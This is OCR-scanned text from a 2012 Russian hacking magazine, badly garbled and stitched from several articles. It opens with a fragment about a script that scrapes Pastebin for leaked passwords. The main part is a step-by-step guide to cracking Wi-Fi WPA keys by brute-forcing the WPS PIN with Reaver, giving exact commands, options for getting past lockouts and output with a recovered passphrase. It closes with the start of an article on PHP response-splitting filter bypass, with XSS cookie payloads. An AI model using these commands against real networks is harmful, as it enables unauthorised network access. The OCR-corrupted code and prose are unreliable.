дет Тwittег-ленту PasteЬinleaks l twitteг.com/# ! / PasteЬin l eaks l, где его робот-парсер автомати­

еsеr -ш (нчs • 'С!!' ): _Ь..ttend_or_uit lstoraoel: Jtor&\lc.connec~(l

not

нoa.oe.connccttdO:

print

>> :~ys.stde п,

сы, которые периодически обходя т контент

таких хостингов и публикуют интересные К примеру, исследователь Джейм Бл аско ве­

utl-tull_url, dtta'"CI.ata)

Н

РАЗВИТИЕ ИДЕИ Интересно, что в Сети даже есть целые ресур­

ссылки с соответствующей классификацией.

ь.ц:h.qroup(IJ

L.ltn!:l( 'utch' ,qentator,t~;e:age,:at c h-:uteh.q:cup(),

.ser

Но даже этого вполне достаточно, чтобы

Скрипт позволяет изящно обходить записи

чески п убликует записи вроде

"!a1led to open stOrl9f! b•ct'IHid•

lyl.t!l.l~( l l

l"etu rn

s ~ orage

PossiЫe

t l"/1 ер~ • • ..sa rse_op~•!•~ • l e;o;cept IC8J"ror • • е : p1"1nt>>sys.Jtdeн,

sya.e;o;i,t( l ) n~....ord•

PossiЫe listing of http passwords http://pastebin.com/qZbccMB7 PossiЫe Juniper configuration with password http://pastebin.com/9vuwzjnS

-

Н op~s.tvB le:

ke \'Wr:>I'ds • _aad_lteyworda(opt s .ltv!ile l i:I JI 811ft:

keywords •

Massive mail/pass leak

http://pastebin.com/LбYbDlЗб

·opt10Qt!tn~r:

D!fAt!L!_кtYio't!RDS

1ourc•• • ! fasteЫnSource(l,

с. ..·~-~­

fasti e S~;~urce (l

~-----

Oestroy Spyware

Справедливости ради стоит сказать , что Исходник грабберана

ХАКЕР

03/158/2012

Python

Раздел

«Trending Pastes)) -

что качают чаще всего?

в последнее время апдейты прекратились. ::х:

017




COVERSTORY •

rlal Nc.

01С10С11100003

Туре

11111181~IOIIIQII IIНIMНIIIIIIIIIIIII IW IIII мд, дddre

C oпntct

Р IN-код уже потен ц иально п одвержен ата­

to il Nttwork

ке типа bгutefoгce. Н о это лишь цве т очки.

the network security key

УЯЗВИМОСТЬ

~( Шit'jkty:

'

COC1C0500D55 ,• • • • • 11111 1111111 ( ;;, 0484-0~

Как я уже заметил ранее, РIN-код состоит

Е] Hidt с lш<~сtш

Y o~r

c;1n :~l so conr1tct bLrttor1 011 tlн• ro~•tt r .

из восьми цифр - следовательно, существует Ьу p щl1rr1g

10л81100

tl1t

но сократить. Д ело в том, что после д няя цифра

="--"-.:==~ РI N - к од

Лоrо ти пWРS

Ри с ун о к

WPS

1. РIN-код WPS, написанный

ок

на корпусе раутера

000 000 1вариантов для подбора. Од ­

нако количество вариантов можно существен ­

Рисунок

2.

Окн о дл я в вод а Р IN-кода

~

РI N-кода представляет собой некую контроль ­ ную сумму, которая высчитывается на осно­

вании семи первых цифр. В итоге получаем

WPS

уже

1ол711 о 000 0001 вариантов. Н о и ЭТО еще

не все! Далее в н имательно смотрим на устрой­

ЦЕНА УПРОЩЕНИЙ Открытых точек доступа, к которым вообще

lхардварнуюl и на компьютере lсофтварнуюl,

ство протокола аутентификации WPS !рисунок 31. Такое ощущение, что е г о специал ь но про­

не надо вводить ключ для подключения,

тем самым активируя процесс настройки.

ектировали, ч т обы оставить возможность для

становится все меньше и меньше. Кажется, что

Нам это неинтересно.

брутфорса. Оказывается, проверка РIN-кода

Ввод РIN-кода в веб-интерфейсе. Пользо­

осущес т вляется в два этапа. Он делится на две

нажимаетспециальную кнопку на раутере

скоро их можно будет занести в Красную книгу.

2.

Если раньше человек мог даже и не знать, что

ватель заходит через бgаузер в админи­

равные части, и каждая часть проверяется от­

беспроводную сеть можно закрыть ключом,

стративны й интерфейс раутера и вводит

дельно! Посмотрим на схему :

обезопасив себя от посторонних подключе­

там РIN-код из восьми цифр, написанный

1.

ний, то теперь ему все чаще подсказывают

на корпусе у стройства !рисунок

о такой возможности. Взять хотя бы кастомные

чегопроисходитпроцесс настройки. Этот

прошивки, которые выпускают ведущие про­

способ подходит скорее для перваначаль­

вайдеры для популярных моделей роутеров,

ной конфигурации роутера, поэтому мы его

чтобы упростить настройку. Нужно указать две

рассматриватьтоже не будем .

вещи- логин/па роль и ... ключ для защиты

11, после

Е сли после о т сылки сообщения М4 атакую­ щий получил в ответ

EAP-NACK, то он

может

быть уверен, что первая ч асть РIN-кода неправильная.

2.

Е сли же он по л учи л

EAP- NACK п осле от­

сылки М6, то, соотве т ственно, вторая часть

Ввод РIN-кода на компьютере пользовате­

РIN-ко д а не в ерна. П олучаем 1 0л411 О

беспроводной сети. Что еще более важно,

ля !рисунок 21 . При соединении с раутером

вариантов для первой полови н ы и 10лз 11

сами производи т ели оборудования стараются

можно открыть специальную сессию

сделать процесс настройки незамыслова т ым.

в рамках которой настроить роутер или

0001 для второй. В итоге имеем всего л ишь 11 000 вариа н то в для пол н о г о п еребора .

Большинство современных раутеров поддер­

получитьуже имеющиеся настройки, если

Чтобы лучше понять, как это буд е т работать,

живают меха н изм

правильно ввести

WPS IWi-Fi Pгotected Setupl.

З.

Pl N - код.

WPS,

Вот это уже п ри­

0001

посмо т ри на схему .

С его помощью пользовател ь за считанные

влекательно.

секунды может настроить безопасную беспро­

Для открытия подобной сессии не нуж -

перебора. Она о г ра н и ч ена скорост ь ю обра ­

водную сеть, вообще не забивая себе голову

на никакая аутентификация. Это может

ботки рау т ером W РS - за п росов: о д ни то ч ки

тем, что «где-то еще нужно включить шифро ­

сделать любой желающий! Получается, что

досту п а будут в ыд а в а т ь резул ьт ат каждую

3.

Важный моме нт - возмож н ая ско р ость

вание и прописать WРА - ключ». Ввел в системе восьмизначный символьный

PIN,

который

написан на роу т ере, - и готово' И вот здесь

IEEE 802.11

держись крепче. В декабре сразу два иссле­

5upplicant--+ АР

Aut hent ication Requ es t

Э т о как

5upplicant - А Р

Authentication Response

черный ход для любого роутера. Оказалось,

5upplicant--+ АР

Association Request

5upplica nt - А Р

Association

дова т еля рассказали о серьезных фундамен­

тальных прорехах в протоко л е

WPS.

что если в точке доступа активирован

WPS !ко­

торый, н а минуточку, вклю ч ен в большинстве

раутеров по умолчанию!, то подобрать PIN для подклю~ения и извлечь ключ для подключе­

WPS?

Задумка создателей

WPS

хороша. Механизм

автоматически за д ае т имя сети и шифрование.

Таким образом, п ользова т елю не т н еобходи­

802.11 Association

IEEE 802.11/ЕАР

ния мож.но за считанные часы! КАК РАБОТАЕТ

Respo пse

802.11 Authentication

5upplicant --+ АР

EAPO L·5tar t

5upplica nt - А Р

EAP-Req uest ldentity

5upplicant ..... АР

EAP·Response ldenti ty (ldenti ty: "WFA-5impleConfig-Regi stra r-1 · 0')

ЕА Р

lnit iation

IEEE 802. 1 1/ЕАР Expanded Туре, Vendo r ID: WFA (Ох372А), Vendor Туре: SimpleConfig (Ох01)

мости лезть в веб - интерфейс и разбираться

М1

En rollee ..... Re gist ra r

N1 11 Description 11 РКЕ

со сложными нас т ройками . А к уже настро­

М2

Enrollee- Regi strar

N1 11 N2l l Description 11 РК я 11 Authenti cator

мз

En rollee ..... Regis t rar

N2ll E·Hash1 11 E·H ash2l l Authe nt icator

М4

Enrollee - Registra r

MS

En rollee ..... Reg istrar

N 1 11 R-Hash 1 11 R-Ha sh2 11Eкevw,.oк.v(R-5 1) 11 Authenticator N2ll Екеуw,.рке/Е-51 ) II Authenticator

Мб

Enrollee - Registrar

N1 11 Екеуw,.рк.у( R-52) II Authentica t or

proove posession of 2' half of PI N

М7

En rollee ..... Reg ist ra r

N2ll Екеуw,.рк.у( Е-52 IIConfig Data) 11 Authent icator

proove posession of 2' half of PIN,

мв

Enrollee - Reg istrar

N1 11 Eкeywrapкey(Con figData) 11 Authenticator

send АР configuratio n set AP configuration

енной сети мож н о без п роблем добави т ь

любое устройство !например, ноу т букl: если правильно ввести

PIN,

то он полу ч ит все необ­

ходимые настройки. Это очень удобно, поэтому

все крупные игроки на рынке ICisco/ L iпksys, Netgeaг, 0- L iпk, B elkiп, Bu ffalo, ZyX ELI сейчас пре д лагают беспрово д ные раутеры с по дд ерж­ кой

WPS.

Разберемся чуть по д робнее.

Существует три варианта испо л ьзования

WPS: 1. Push-Buttoп - Coппect IPBC I. П ользователь

020

Рису н о к З . Прото к ол аутентифи к аци и

Diffie·Heltman

Кеу

Exchange

proove posession of 15 ha lf of PIN proove posession of 1st hatf of PI N

WPS

ХАКЕР

03/158/2012


В зломать

HOWTO:

Осно вн ое время п ри этом затра ч ивается

<.. . > trying 18674095

нарасчетотк р ы т о г оклю ч апоалгоритму

PIN

Д иффи - Хеллмана, он д олже н бы т ь сгенери­

<.. . > Networ k Кеу: reall y_re ally_lon g_wpa_p assphr ase_good_ luck_crack i ng_t his_one <.. . >

секун д у, д ругие- каж д ые десят ь секун д .

рова н п е р е д шаг ом МЗ. З атра че н ное на зто время мож н о у м е н ь шить , вы б р ав н а сторо н е клиента простой сек р ет н ый к л юч, который в д альнейurем упрос т и т р асчеты других

Wi- Fi

за

ч асо в

# f ound 2st half of

ключей . П рактика показы в ает, чтод л я ус п е шн о г о р езульт а т а обы чн о д ос т а т оч н о

Как видишь, сначала была nодоб р ана

п еребрать лиш ь п оло в ину всех вариантов,

первая nоловина РIN-кода, затем - в т орая,

и в среднем брутфорс занимает всего отче ­

и в конце концов программа выдала готовый

т ыр ех д о д еся т и часов.

к использованию ключ для подключения

к беспроводной сети. Сложно п ре д с т а в и т ь,

ПЕРВАЯ РЕАЛИЗАЦИЯ

сколько времени потребовалось бы, чтобы

Первой появившейся реализацией брутфорса

подобрать ключ такой длины [61 символ)

стала утилита wpsc г ack

ранее существовавшими инструментами.

[goo.gl/9wABj l, на ­

писа нна я иссле д о в ателем Стефа н ом Фибё ­

В п р очем, wpscгack не единственная утилита

ком на я зыке

для эксплуа т ации уязвимости, и это довольно

Pytho n. Ут илита

исnользовала

библиотеку 5сару, п оз в оляю щ ую конструиро­

забавный момент: в то же само~ время над

вать п р оиз в ольн ы е сетевые пакеты. Сценарий

той же самой проблемой работал и другой

мож н о за п ус т ит ь т олько п о д L in u х-системой,

исс л едователь- Крейг Хеффнер иэ компании

п ре д в а ри т ельно nе р еве д я бес п роводной

Tactical

интерфейс в режим мониторинга. В качес т ве

появился работающий РоС для реализа-

параметров необхо д имо указа т ь имя сетевого

ции атаки, он опубликовал свою у т илиту

интерфейса в сис т еме , МАС - а др ес бес п ро­

Reaveг lc o de . g o ogle .co m / p /гea v eг- w ps l. Она

во дн о г о адаn тер а , а т акже МАС - а др ес то ч ки

н е только автоматизирует процесс п о д бора

доступа и ее название

WP5 - PIN

[551 01.

N etwoгk

5olutions.

Инкремент~уем

2 часть PIN

·~·

nepecчиtloiВ88U

контра~ьную сумму

Увидев, что в Сети

и извлекает Р5К - ключ, но и пред­

ла г ает большее количество настроек, чтобы

$ ./wpscrack .py --iface mon0 \

атаку можно было осуществить про т ив самых

--client 94:0с:бd:88 : 00 : 0 0 \ - -bssid f4:ec:38: cf :00:00 --ssi d t est ap - v sniffer st arted trying 00000000 attempt took 0.95 seconds try ing 00010009 < ... > try ing 18660005 attempt too k 1.08 se conds try ing 18670004 # found 1st half of

раз н ых рау т е ров. К тому же о н а п о дд ержи в ает

Рисунок

4. Блок - с х ема

брутфорса РIN-кода

WPS

в одных ус т ройств. Поз т ому ис п ользовать мы будем именно его. Шаг О. Готовим систему

нам н ого большее количество беспроводных

На официальном сай т е B ackTгack

адаптеров. Мы решили взять ее за основу

ступен для загрузки в виде виртуал ь ной

и подробно описать, как злоумышленник

машины под VMwa г e и загрузочного образа

может использовать уязвимост ь в про т околе

150.

WP5 для

просто записат ь об р аз на болва н ку, а мож н о

подключения к за щ и щ ен н ой бес­

д о­

Рекомен д ую п ос л е д ни й в ари а нт . Мож н о

с помощью программы

проводной сети.

5 R1

UNetbooti n [ uпetboot i n.

souгcefoгge . net l с д е л ать загрузо чн ую фле ш ку:

i:I•NIIel

так или ина ч е, за г рузив ш ис ь с т ако г о носи ­

К а к и для любой другой атаки на бес п ровод ­

теля, мы без л и ш них заморачек сразу буд ем

ную сеть, нам понадобится

иметь систему, готовую к работе.

Linux.

Ту т надо

PIN

сказать, что Reaveг присутствует в репазито­

attempt too k 1.09 se cond s t ry ing 18670011 att empt t ook 1.08 second s

ри и всеми известного дистрибутива B ackTгack

Шаг

[ backtгack- li nux.oгg l , в котором к тому же уже

Л огин и п араль дл я вхо д а по умо лча нию ­

в клю ч ены необходимые драйвера для беспро -

1. Вход

в систему

гооt:tоо г. О каз а вшись в консо л и, можно сме л о

старто в а ть иксы [ест ь отдель н ые с борки B ackTгack - как с

GNOME, т ак и с К ОЕ) :

# st art x

ЭКСПРЕСС-КУРС ПО ВЗЛОМУ WI-FI

Шаг

2. Установка

Reaveг

Чт обы загр узи ть R eav eг, нам п о над об ит с я

1. WEP (Wiгed Equivalent Pгivacyl

брать ключ для за к рытой WPA/WPA2 сети [да

и н тер н ет. П оэ т ому п о д к л ю ч аем пат чко рд

Самая первая технология для защиты бес­

и то исключительно при наличии дампа так

или настраи в аем бес про во д ной а д а пт ер

проводной сети оказалась крайне слабой.

называемого

[Applications ~ l nte гn et 7 Wicd N e t wo г k

Взломать ее можн о буквально за несколько

ется в эфир при подключении клиента к точке

минут, используя слабости применяемого в ней

доступа) . Брутфорс может затянуться на дни,

ми н ала, гд е загружаем п ос л е днюю в е р си ю

шифра

месяцы и годы . Для увеличения эффективно­

у т или т ы ч ерез р е п озиторий :

RC4. Основными

инструментами здесь

WPA

Haпdshake, к оторый переда ­

служат снифер aiгodump-пg для сбора па кетов

сти перебора сначала использовались специа­

и утилита aiгcгack-ng, используемая непосред­

лизированные словари, потом были сгенери­

ственно для взлома ключа. Также существует

рованы радужные таблицы, позже появились

специальная тулза wesside-пg, которая вообще

утилиты, задействовавшие те х нологии

взламывает все близлежащие точки с

CUDA

WEP

и

ATI

# apt - get update # apt-get install rea ve r

NVIDIA

5tгeam для аппаратного ускорения

Тут на д о сказат ь , ч т о в ре п ази т а р ии н а­ хо д и тся в е р сия

2. WPA/WPA2 (Wiгeless Pгotected Access)

GPU. Используемые инстру ­ менты- аiгсгасk-пg (брутфорс по словарю), cowpatty [с по м ощью раду ж ны х т а блиц) , pyгit

Перебор-это единственный способ подо-

[с исполь з ова н ие м в и део к артыl .

рекомен д уе т обновит ь ся до максимал ь но

в автоматическом режиме .

ХАКЕР

03 /158/ 2012

процессаза счет

Man age г l . Дал ее з ап ускаем эмулят о р тер ­

1.3,

ко т орая ли чн о у ме ня

зар а бо т а ла н е пр ави льн о. П оиска в ин ф о р м а ­ цию о проблеме, я на ш ел пост а вт ора, который

021


COVERSTORY возможной версии, скомnилировав исход­

ники, взятые из

SVN.

Эта команда создает виртуальный интер­

Это, в общем, самый

фейс в режиме мониторинга, его название

у нивер са льный с n особ уст ановки ( для любого

будет указано в выводе команды (обычно это monOI . Теnерь нам надо найти точку достуnа

дистриб утива !.

для а та ки и узнать её

BSSID . Восnользуемся

у ти литой для nрослушки бес n ро в о дн ого эфира

$ svn checkout http ://reaver-wps. googlecode .com/sv n/ trunk / reaver-wps $ cd ./reave r-wps / src / $ . /configure $ make # make install

aiгodump-ng:

# airodump-ng mon0 На экране nоявится сnисок точек достуnа

Рисунок

6. Reaver Pro- железка от создателей Reaver

в радиусе досягаемости. Нас интересуют точки Никаких проблем со сборкой nод BackTгack не будет - nроверено лично . В дистрибутиве Агсh

Linu x,

ко торы м nользуюсь я, установка

с шифрованием

# reaver -i mon0

по ключу

WPA/WPA2 и аутентификацией PSK. Лучше выбирать одну из nер­

-vv

00:21:29:74:67:50

вых в сnиске, так как для nроведения атаки

Ключ

включает расширенный вывод

nроизводится и того nр о ще , благодаря нали­

желательна хорошая связь с точкой. Если точек

чию соотве т с тв ую щего

много и сnисок не умещается на экране, то мож­

nрограммы, чтобы мы могли убедиться, что все

но восnользоваться другой извест н ой утилитой

работает как надо .

PKGBUILD'a:

там интерфейс более nрисnособлен

- kismet,

$ yaourt -5 reaver-wps-svn

в этом nлане. Оnционально _можно на месте nро­ Шаг

3.

Подготовка к брутфорсу

верить, включен ли на нашей точке механизм

WPS. Для этого в комnлекте с Reaveг (но только если брать его из SVNI идет утилита wash :

Для исnользования Reaveг необходимо nро­ делать следующие вещи:

nеревести бесnрово дно й а даnте р в режим

# ./wash -i mon0

мониторинга;

узнать имя бесnроводно г о интерфейса;

• • •

узнать МАС-а дрес т очки д остуnа (BSS IDI; убедиться, что на т очке активирован

В качестве nараметра задается имя интерфейса, nереведенного в режим мони­

WPS.

торинга. Также можно исnользовать оnцию

интерфейс вообще nрисутств уе т в системе:

наnример, тем же aiгodump-ng. По неnонятной

# iwconfig

ляет PIN'ы точке д остуnа, значит, все завелось

ли утилиту

хорошо, и остается туnо ж дать . Пр оцесс может

wash.

Будем надеяться, к моменту

nубликации статьи эту ошибку исnравят.

затянуться. Самое короткое время, за которое

Шаг

nримерно nять часов. Как только он буд ет nо­

мне удалось сбрутфорсить

wlanOI- значит,

4. Запускаем

брутфорс

система расnознала адаnтер !если он nодклю­

Теnерь можно nристуnать неnосредственно

чалея к бесnрово дн ой сети, чтобы загрузить

к nеребору

nростом случае нужно немного. Необходимо

П ере в е д ем адаnтер в режим мониторинга:

лишь указать имя интерфейса (nереведенного

# airmon-ng start wlan0

точки достуnа:

нами ранее в режим мониторинга! и BSSIO

00:21·29:74:67:50

-с б

Reaver v1.~ W1F1 Protected Setup Attac~ Tool Copyrtght (CI 2011, Tact1cal Network Solutions. Cra1g Heffner

1-1

~att1ng

[-]

S~I!Chtng ~onO

l1nksys -d 15 -vv

Рисунок

00:21:29.74:67:50

1

022

5. Пример работы

WPA-PSK,

который сразу же можно ис­

МОЖНО ЛИ ЗАЩИТИТЬСЯ? сnособом- отключить нафиг

Wa1t1ng for beacon from 00:21:29:74:67:50 Sw1tch1ng monO to channel б Assoctзted w1th 00:21:29·7J·67:SB (ESSID: l1nksysl Trv1na p1n 64637129 Кеу cracked 1n 2 seconds WPS PIN: '64637129' ~РА PSK· MyHOrseTh1nkSYouStolЗH1sCarrot • -1 АР SSID: l1nksys

1

ключ

Защититься от атаки можно nо ка о дн им

б

l1nksys --p1n 64637129 -vv

Reaver v1.~ W1F1 Protected Setup Attack Tool Copyr1ght lcl 2011, Tact1cal Net~ork Solutions, Cra1g Heffner ccheffnerJtacnetsol.com>

•1 ·1 •1 •1 ·1 •l -1

[+] Trying pin 64637129 [+] Кеу cracked in 13654 seconds [ +] WPS PIN: '64637129' [+] WPA PSK: 'MyH0r seThink$You5tol3HisCa rrot!' [+] АР SSID: 'linksys'

что даже не укладывается в голове.

·с

добран, nрограмма радостно об этом сообщит:

nользовать для nодключения. В се та к nросто,

[-] т~-y1r1g р111 61889978 [' 1 WARNING· Rece1ve t1meout occurred ~onO

составило

Самое ценное здесь- э т о, конечно же, ccheffner~tacnetsol.com>

•or beacon from 00:21·29·7J:67:50 to channel б 1·1 Assoc1зted w1th 00.21:29.74.67:50 1ESSID: 11nksys) !·1 Trv1ng p1n 63979978

reaver -1

PIN,

PIN'a. Для старта Reaveг в самом

Reaveг, то лучше обо рвать nод ключение!.

~onO

Если nрограмма n ос лед о вательн о отnрав­

nричине в nакет Reaveг в BackTгack не включи ­

Е сли в выводе э той команды есть интер­

reaver -1

Reaver v1 .4 WiFi Protected Setup Attac k Tool Copyright (с) 2011, Tactical Network Solutions, Craig Heffner <c heffner@ tacnetsol .com> [+] Waiting for beacon from 00:21:29:74:67:50 [+] Associated with 00:21:29:74:67:50 ( ESSID : linksys) [+] Trying pi n 63979978

'-f' и скормить утилите сар-файл, созданный,

Для начала nроверим, что бесnроводной

фейс с оnисанием (обычно это

"-vv"

WPS

в настрой­

ках роутера. Правда , как оказалось, с д е лат ь э т о возможно дале ко не всегда . П оско л ьку уязвимость су щ ествуе т не на уровне реализа­ ции , а на уров не nротокола, ждать от nроиз­

водителей скоро г о nатча, ко торый решил бы все nроблемы, не стоит. Самое большее, что они могут сейчас с д елать, - это максима льн о nротиводействовать брутфорсу. Наnример, если блокиро ват ь

WPS

на один час nосле nяти

неудачных nоnыток ввода РIN- ко да , то nеребор займет уже около

90 дней.

Но другой в оnрос,

насколько быстро можно накатить такой патч

на миллионы устройст в , ко т орые работают брутфорса

Reaver

по всему миру? :х:

ХАКЕР

03/158/201 2


HOWTO:

Взломать

Wi-Fi

за

10

часов

FAQ r;t

a.l

n

Какой беспроводной адаптер нужен

был поврежден по пути. д вот для атаки

литы

для взлома?

на

находится в списке .

WP5

необходимо строгое следование

wash:

запусти её и проверь, что твоя цель

Перед тем как экспериментировать,

протоколу передачи па кетов между точкой

Почему я не могу ассоциироваться

нужно убедиться, что беспроводной

доступа и Reaveг для проверки каждого

с точкой доступа?

адаптер может работать в режиме монито­

РIN-кода . Если при этом какой-то пакет

Это может быть из-за плохого уровня

ринга . Лучший способ- свериться со спи­

потеряется, либо придет в непотребном

ском поддерживаемого оборудования

виде , то придется заново устанавливать

18.1

сигнала или потому, что твой адаптер непригоден для подобных изысканий.

на сайте проекта Аiгсгасk-пg ( Ьit.ly/wifi

WР5-сессию. Это делает атаки на

adapteг list l. Если же встанет вопрос о том,

гораздо более зависимыми от уровня

какой беспроводной модуль купить, то

сигнала. Важно помнить, что если твой

начать можно с любого адаптера на чипсете

беспроводной адаптер видит точку доступа ,

RTL8187L . U5В'шные донглы легко найти винтернетеза $20.

WP5

r;1

"гаtе limiting detected"?

то это ещё не значит, что и точка доступа

181

доступа заблокировала WP5 . Обычно

видит тебя . Так что если ты являешься

это временная блокировка (около пяти минут!, но в некоторых случаях могут влепить и перманентный ба н (разблокировка

n

счастливым обладателем высокомощного

1':'1 ~

n

Почему у меня возникают ошибки

адаптера от

"timeout"

на пару десятков

и "out of огdег"?

Обычно это происходит из-за низкого

уровня сигнала и плохой связи с точкой

18.1

доступа. Кроме того, точка доступа может

Netwoгk и антенl!ы

ALFA

dBi , то

только через административную панельl .

не надейся , что

получится поломать все пойманные точки

Есть один неприятный ба г в Reaveг версии

доступа .

1.3,

из-за которого не определяются снятия

подобных блокировок . В качестве варюра­ Почему у меня не работает спуфинг

унда предлагают использовать опцию

a.l

МАС-адреса?

· --ignoгe-locks' или скачать последнюю

Почему при плохом сигнале Reaveг

...

Возможно, ты спуфишь МАС виртуально-

версию из

работает плохо, хотя тот же взлом WEP

181

го интерфейса mопО, а это работать

WP5.

проходит нормально?

не будет. Надо указывать имя реального

n обычно взлом

интерфейса, например, wlaпO .

WEP происходит путем повторной пересылки перехваченных

181

Это происходит потому, что точка

r;t

на время заблокировать использование

1':'1 a.l

Почему я постоянно получаю ошибки

a.l

5VN.

mМожно ли одновременно запустить два и более экземпляров Reaveг для ускорения

атаки?

n

Теоретически МОЖНО, НО если ОНИ будут

па кетов, чтобы получить больше векторов

Reaveг все время посылает точке доступа

инициализации (IVI, необходимых для

один и тот же

успешного взлома . В этом случае неважно,

Проверь, активирован ли на раутере

скоростьперебораедвалиувеличится,таккак

потерялея какой-либо пакет, либо как-то

WP5. Это

в данном случае она ограничивается слабым

ПРОКАЧИВАЕМ В

PIN,

можно сделать при помощи ути-

долбить одну и ту же точку доступа, то

REAVER

мы показали самый простой и наиболее универсальный

HOWTO

181

в чем дело?

способ использования утилиты Reaveг. Однако реализация

WP5 у

разных

5. Некоторые точки доступа

могут блокировать

WPS на

определенное

время , заподозрив, что их пытаются поиметь. Reaveг эту ситуацию замечает

производителей отличается, поэтому в некоторы х случаях необходима

и делает паузу в переборе на

дополнительная настройка. Ниже я приведу дополнительные опции,

паузы можно менять:

315

секунд по умолчанию, длительность этой

которые могут повысить скорость и эффективность перебора ключа.

# reaver -i

1. Можно задать номер

канала и

# reaver -i

00 : 01:02:03:04:05

6. mопВ

mопВ -Ь

00:01:02:03:04:05 --lock-delay=25B

5510 точки доступа: -с

11

-е liпksys

Некоторые реализации протокола

WPS

разрывают соединение при

неправильном РIN-коде, хотя по спецификации должны возвращать особое сообщение . Reaveг автоматически распознает такую ситуацию, для этого

2.

Благотворно сказывается на скорости брутфорса опция

·-- dh-small',

существует опция · --пасk' :

которая задает небольшое значение секретного ключа, тем самым облегчая

# reaver -i

расчеты на стороне точки доступа:

# reaver -i

mопВ -Ь

00:01:02:03:04:05 -vv --dh-small

7. Опция

mопВ -Ь

00:01:02:03:04:05

--пасk

' --eap-teгmiпate' предназначена для работы с теми АР, которые

требуют завершения WРS-сессии с помощью сообщения ЕАР

3. Таймаут ожидания

необходимости его можно изменить:

# reaver -i

# reaver -i

8. Возникновение

mопВ

FAIL:

ответа по умолчанию равен пяти секундам . При

00 : 01:02:03:04:05 -t 2

mопВ -Ь

00:01:02:03:04:05

--eap-termiпate

ошибок в WР5-сессии может означать, что АР

ограничивает число попыток ввода РIN-кода, либо просто перегружена

4. Задержка

между попытками по умолчанию равна одной секунде. Она

# reaver -i

ХАКЕР

mопВ -Ь

03 /158/ 20 12

00:01:02:03:04:05 -d

запросами . В этом случае Reaveг приостанавливает свою деятельность,

причем время паузы может быть задано с помощью опции

т акже может быть настроена: В

# reaver -i

mопВ -Ь

·--fail-wait':

00:01:02:03:04:05 --fail-wait=360

023




COVERSTORY <script>alert("Recognize-Security " +document .cookie ); </script>< !-- "></ head ><body></body></html >

DISCLAIMER

Вообще, в п роцессе аудита исходно г о кода веб-приложений

на РНР часто попадаются конструкции вида

header( "Location: " .$_GET[ 'backto_url' ]) или даже header( "Location: / index. php?lang=".$_G ET[ 'lang' ]). Е сли первую еще можно классифициро­

ZeгoNights, а лишь написана по его мотивам. Помимо материала,

вать хотя бы как уяз вимость класса О реп R ediгect, то вторая вроде

дальнейших исследований, посвященных филырации РНР­

бы вообще не является уязвимостью . Опытный читатель заметит,

функций и механизмам работы браузеров с

чт о здесь в явном виде как раз таки и присутствует ба г типа НТТР

доклада, касающаяся уязви мастей, связанных с заражением

Response Sp li tti ng, %0 d%0a

изложенного во время доклада, в статью также вошло оnисание .

cookies. Часть

кеш а, и smuggling-aтaк, будет изложена в расширенном виде

н о всё дело в том, ч т о современные версии

интерпретатора РНР [начиная с 2006-го года] фильтруют раздели­ тели

Эта статья не является копией моего доклада на конференции

в следующих выпусках журнала.

и препятствуют проведению атаки. Вот это и есть та

самая практическая предпосылка, которая заставила меня начать

углубленное изучение данной темы. Поэтом у предлагаю не верить

сии РНР

первому впечатлению о фильтрации в функции headeг[] и разо­

которая предотвращает внедрение заголовков и защищает от атак

браться с проблемой глубже, ведь, быть может, т акую фильтрацию

типа «расщепление ответа>>. Таким образом, начиная с в ерсии РНР

4.4.2

можно обойти.

и

4.4.2

5.1.2,

и

5.1.2

в этой функции осуществляется фильтрация,

приведенный ниже код н е является уязвимым для атак

типа <<в недр ение заголовков>> и <<расщепление ответа>>:

ПРОТОКОЛ НТТР Обратимся к переаисточнику [спецификации протокола НТТР] , что­ бы понять, какие символы могут служить разделителями заголов­

ков НТТР- ответа. П олный текст спецификации доступен по адресу

Ьit .l y/ г9pLL , нас же интересует раздел

6 - Re sponse

c ?php header( "Location : / basic/ " .$_GET[ 'redirect ' ] . ".html" ); ?>

[ Ьi t .ly/BEAq4 ].

Общая структура НТТР- ответа имеет следующий вид :

В результате попытки проведения таких атак будет вызвана ошибка типа Waгniпg, примерно такая:

RFC-2616 Response = Status-Line; Section 6.1 * (( general-header; Section 4.5 1 response-header; Section 6.2 1 entity-header ) CRLF); Section 7.1 CRLF [ message-body ]; Section 7.2

Документация

test.php?xxx=bbb%0a%0dNew-Header:ЫaЬla

Warning: Header may not contain more than а single header, new line detected. in test.php оп line 2 Н о давай не будем сразу навешивать ярлыки, а разберемся в проблеме чуть глубже. Рассмотрим код интерпретатора, который

Из приведенной выше информации ясно, что разделителем заголо вк ов является последовательность

CRLF,

пользуется для о тд еления тела отве т а о т блока заголовков . В кодированном виде

CR LF

выглядит как

выполняет фильтрацию разделителя :

которая также ис­

%0 D%0A.

URL-

Именно в таком

виде она и используется для проведения классических атак типа

«рас щепление запроса». Эти методы хорошо работали до тех пор, пока интерпретаторы не обзавелись функциями фильтрации

CRLF,

/* new line safety check */ char *s = header_line, * е = header_line + header_line_ len, * р; while (s < е && (р memchr(s, ' \n' , (е - s)))) { i f ( *(р + 1 ) == ' 11 *( р + 1 ) == '\t ' ) {

о ко т орых сейчас и пойдет речь.

5 =

р

+ 1;

continue ; ФИЛЬТРАЦИЯ РАЗДЕЛИТЕЛЯ

CRLF

В РНР

Ф ункци я headeг[] [ Ьit .l y/wVbbcd ] широко используется в РНР для

efree(header_line ); sapi_module.sapi_error(E_WARNING, "Header may not contain more than а single header, new line detected. "); return FAILURE;

передачи заголовков в НТТР -ответе сервера. Чаще всего ее при­

меняют для переадресации пользователей с одной страницы веб­ приложения на другую. Как видно из документации, начиная с в ер-

Browser Single

Second Content-Length header

data

header

schema

splltter byte

ln Refresh header

Как видно, здесь осуществляе т ся проверка на наличие символа

LF

[в URL-кодированном виде выглядит как % Од] . Пр и обнаруже­

нии такого символа, после которого стоит что-то кроме табуля-

ции

[%09]

и пр обела

фильтруется н е

[%20], вызывается ошибка. Таким образом, CRLF, а только LF-байт. Согласно RFC , который мы

недавно изучили, всё работае т безопасно. Н о предл а гаю не сда­ ваться так быстро и узнать у браузеров, соблюдаю т ли они

RFC

в точности? П ервым делом можно проверить, как браузеры воспри­ нимают заголовок с первым пробелом и табуляцией. Для этого на­ пишем прос т ой РНР-скрипт и проверим его под в семи браузерам и :

Таблица тестирования браузеров на одиночный разделитель, двойной заrоловок длины и Refresh-зaroлoвoк

026

c?p hp header( "X-Test1:1 \ r \ n Set-cookie: is1=0K " ); header( "X -Test2 : 2\ r \ n\ tSet-cookie : is2=0K" ); echo "cscript >alert(document.cookie) </ script >" ; ?>

ХАКЕР

03/158/2012


Расщепляй и властвуй

